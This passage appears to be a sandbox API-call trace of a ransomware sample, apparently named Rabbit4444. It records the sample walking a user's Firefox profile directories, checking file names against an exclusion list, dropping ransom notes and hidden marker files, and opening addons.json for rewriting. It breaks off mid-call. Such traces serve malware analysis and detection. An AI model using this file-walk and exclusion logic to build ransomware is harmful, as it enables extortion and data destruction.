ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pending Pings", cAlternateFileName="PENDIN~1")) returned 1 [0050.629] lstrcmpiW (lpString1="Pending Pings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.629] lstrcmpiW (lpString1="Pending Pings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="Rabbit4444.exe") returned -1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2=".") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="..") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="windows") returned -1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="bootmgr") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="pagefile.sys") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="boot") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="ids.txt") returned 1 [0050.630] lstrcmpiW (lpString1="Pending Pings", lpString2="NTUSER.DAT") returned 1 [0050.630] lstrcpyW (in: lpString1=0x130eb98, lpString2="Pending Pings" | out: lpString1="Pending Pings") returned="Pending Pings" [0050.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0050.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x101d98 [0050.630] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0050.630] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="Rabbit4444.exe") returned -1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="windows") returned -1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="bootmgr") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="pagefile.sys") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="boot") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="ids.txt") returned 1 [0050.630] lstrcmpiW (lpString1="Profiles", lpString2="NTUSER.DAT") returned 1 [0050.630] lstrcpyW (in: lpString1=0x130eb98, lpString2="Profiles" | out: lpString1="Profiles") returned="Profiles" [0050.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6548 [0050.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10e768 [0050.630] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6550 | out: ListHead=0xf68b0, ListEntry=0xf6550) returned 0xf63b0 [0050.630] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 1 [0050.630] lstrcmpiW (lpString1="profiles.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.630] lstrcmpiW (lpString1="profiles.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.630] lstrcmpiW (lpString1="profiles.ini", lpString2="Rabbit4444.exe") returned -1 [0050.630] lstrcmpiW (lpString1="profiles.ini", lpString2=".") returned 1 [0050.630] lstrcmpiW (lpString1="profiles.ini", lpString2="..") returned 1 [0050.630] lstrcmpiW (lpString1="profiles.ini", lpString2="windows") returned -1 [0050.631] lstrcmpiW (lpString1="profiles.ini", lpString2="bootmgr") returned 1 [0050.631] lstrcmpiW (lpString1="profiles.ini", lpString2="pagefile.sys") returned 1 [0050.631] lstrcmpiW (lpString1="profiles.ini", lpString2="boot") returned 1 [0050.631] lstrcmpiW (lpString1="profiles.ini", lpString2="ids.txt") returned 1 [0050.631] lstrcmpiW (lpString1="profiles.ini", lpString2="NTUSER.DAT") returned 1 [0050.631] lstrcpyW (in: lpString1=0x130eb98, lpString2="profiles.ini" | out: lpString1="profiles.ini") returned="profiles.ini" [0050.631] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", dwFileAttributes=0x0) returned 1 [0050.631] lstrlenW (lpString="profiles.ini") returned 12 [0050.631] lstrlenW (lpString="Rabbit4444") returned 10 [0050.631] lstrcmpiW (lpString1="ofiles.ini", lpString2="Rabbit4444") returned -1 [0050.631] lstrlenW (lpString=".dll") returned 4 [0050.631] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0050.632] lstrlenW (lpString=".lnk") returned 4 [0050.632] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0050.632] lstrlenW (lpString=".ini") returned 4 [0050.632] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0050.632] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 0 [0050.632] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0050.632] lstrcpyW (in: lpString1=0x130eb98, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.632] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.632] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.632] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.632] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.632] CloseHandle (hObject=0x278) returned 1 [0050.633] CloseHandle (hObject=0x27c) returned 1 [0050.633] GetCurrentThreadId () returned 0xd98 [0050.633] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6550 [0050.633] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0050.633] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e768 | out: hHeap=0xe0000) returned 1 [0050.633] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6548 | out: hHeap=0xe0000) returned 1 [0050.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0050.633] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0050.633] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3" [0050.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.634] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.637] FlushFileBuffers (hFile=0x27c) returned 1 [0050.638] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.638] CloseHandle (hObject=0x27c) returned 1 [0050.639] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 56 [0050.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.639] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe78091a7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0050.639] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.639] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.639] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.639] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.639] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe78091a7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.639] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.639] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.639] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.639] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.639] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.639] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe78091a7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe78091a7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe78091a7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.639] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.639] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.639] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb83449e5, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w7cr0hor.default", cAlternateFileName="W7CR0H~1.DEF")) returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="Rabbit4444.exe") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2=".") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="..") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="windows") returned -1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="bootmgr") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="pagefile.sys") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="boot") returned 1 [0050.639] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="ids.txt") returned 1 [0050.640] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="NTUSER.DAT") returned 1 [0050.640] lstrcpyW (in: lpString1=0x130ebaa, lpString2="w7cr0hor.default" | out: lpString1="w7cr0hor.default") returned="w7cr0hor.default" [0050.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0050.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x114098 [0050.640] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf63b0 [0050.640] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb83449e5, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w7cr0hor.default", cAlternateFileName="W7CR0H~1.DEF")) returned 0 [0050.640] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0050.641] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.643] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.643] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.643] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.643] CloseHandle (hObject=0x278) returned 1 [0050.643] CloseHandle (hObject=0x27c) returned 1 [0050.643] GetCurrentThreadId () returned 0xd98 [0050.643] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0050.643] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default" [0050.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114098 | out: hHeap=0xe0000) returned 1 [0050.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0050.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default" [0050.644] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\" [0050.644] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3" [0050.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.646] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.649] FlushFileBuffers (hFile=0x27c) returned 1 [0050.650] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.650] CloseHandle (hObject=0x27c) returned 1 [0050.655] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default") returned 73 [0050.655] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.655] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe782f45b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0050.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.655] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.655] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.655] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.655] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe782f45b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.687] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.687] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.687] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.687] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.687] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.687] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe782f45b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe782f45b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe782f45b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.687] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.687] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.687] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a3ab44, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a3ab44, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a3ab44, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="Rabbit4444.exe") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2=".") returned 1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="..") returned 1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="windows") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="bootmgr") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="pagefile.sys") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="boot") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="ids.txt") returned -1 [0050.687] lstrcmpiW (lpString1="addons.json", lpString2="NTUSER.DAT") returned -1 [0050.687] lstrcpyW (in: lpString1=0x130ebcc, lpString2="addons.json" | out: lpString1="addons.json") returned="addons.json" [0050.688] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json", dwFileAttributes=0x0) returned 1 [0050.688] lstrlenW (lpString="addons.json") returned 11 [0050.688] lstrlenW (lpString="Rabbit4444") returned 10 [0050.688] lstrcmpiW (lpString1="ddons.json", lpString2="Rabbit4444") returned -1 [0050.688] lstrlenW (lpString=".dll") returned 4 [0050.688] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.688] lstrlenW (lpString=".lnk") returned 4 [0050.688] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.688] lstrlenW (lpString=".ini") returned 4 [0050.688] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.688] lstrlenW (lpString=".sys") returned 4 [0050.689] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addons.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.689] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.689] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14199948650) returned 1 [0050.689] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=24) returned 1 [0050.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0050.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0050.689] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0050.690] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0050.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.691] RtlAllocateHeap 